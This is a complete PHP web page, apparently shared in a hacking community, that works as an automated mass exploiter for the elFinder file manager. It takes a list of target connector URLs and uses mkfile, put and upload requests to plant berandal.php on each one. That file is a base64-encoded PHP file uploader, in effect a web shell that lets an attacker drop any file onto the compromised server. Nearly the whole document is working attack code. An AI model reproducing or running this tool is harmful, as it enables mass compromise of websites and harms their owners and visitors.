Berandal

1. <html>
2.  
3.  
4.  
5. <title>Berandal</title>
6.  
7. <style type="text/css">
8.  
9. html {
10.  
11. text-align: center;
12.  
13. }
14.  
15. a {
16.  
17. text-decoration: none;
18.  
19. color: black;
20.  
21. }
22.  
23. </style>
24.  
25.  
26.  
27. Nitip nick cok!<br>
28.  
29. <h1>Berandal elFinder Auto Exploiter</h1>
30.  
31. <form method="post">
32.  
33. Target: <br>
34.  
35. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:
36. none;"></textarea><br>
37.  
38. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="SIKAT!">
39.  
40. </form>
41.  
42. </html>
43.  
44. <?php
45.  
46. # Berandal
47.  
48. function ngirim($url, $isi) {
49.  
50. $ch = curl_init ("$url");
51.  
52. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
53.  
54. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
55.  
56. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
57.  
58. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
59.  
60. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
61.  
62. curl_setopt ($ch, CURLOPT_POST, 1);
63.  
64. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
65.  
66. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
67.  
68. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
69.  
70. $data3 = curl_exec ($ch);
71.  
72. return $data3;
73.  
74. }
75.  
76. $target = explode("\r\n", $_POST['target']);
77.  
78. if($_POST['x']) {
79.  
80. foreach($target as $korban) {
81.  
82. $nama_doang = "berandal.php";
83.  
84. $isi_nama_doang =
85. "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
86. lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV
87. 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
88.  
89. $decode_isi = base64_decode($isi_nama_doang);
90.  
91. $encode = base64_encode($nama_doang);
92.  
93. $fp = fopen($nama_doang,"w");
94.  
95. fputs($fp, $decode_isi);
96.  
97. echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
98.  
99. echo "# Upload[1] ......<br>";
100.  
101. $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
102.  
103. $b = file_get_contents("$url_mkfile");
104.  
105. $post1 = array(
106.  
107. "cmd" => "put",
108.  
109. "target" => "l1_$encode",
110.  
111. "content" => "$decode_isi",
112.  
113. );
114.  
115. $post2 = array(
116.  
117. "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
118.  
119. "upload[]" => "@$nama_doang",);
120.  
121. $output_mkfile = ngirim("$korban", $post1);
122.  
123. if(preg_match("/$nama_doang/", $output_mkfile)) {
124.  
125. echo "# Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
126.  
127. } else {
128.  
129. echo "# Upload Gagal Cok! 1 <br># Uploading 2..<br>";
130.  
131. $upload_ah = ngirim("$korban?cmd=upload", $post2);
132.  
133. if(preg_match("/$nama_doang/", $upload_ah)) {
134.  
135. echo "# Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
136.  
137. } else {
138.  
139. echo "# Upload Gagal Lagi Cok! 2<br><br>";
140.  
141. }
142.  
143. }
144.  
145. }
146.  
147. }
148.  
149. ?>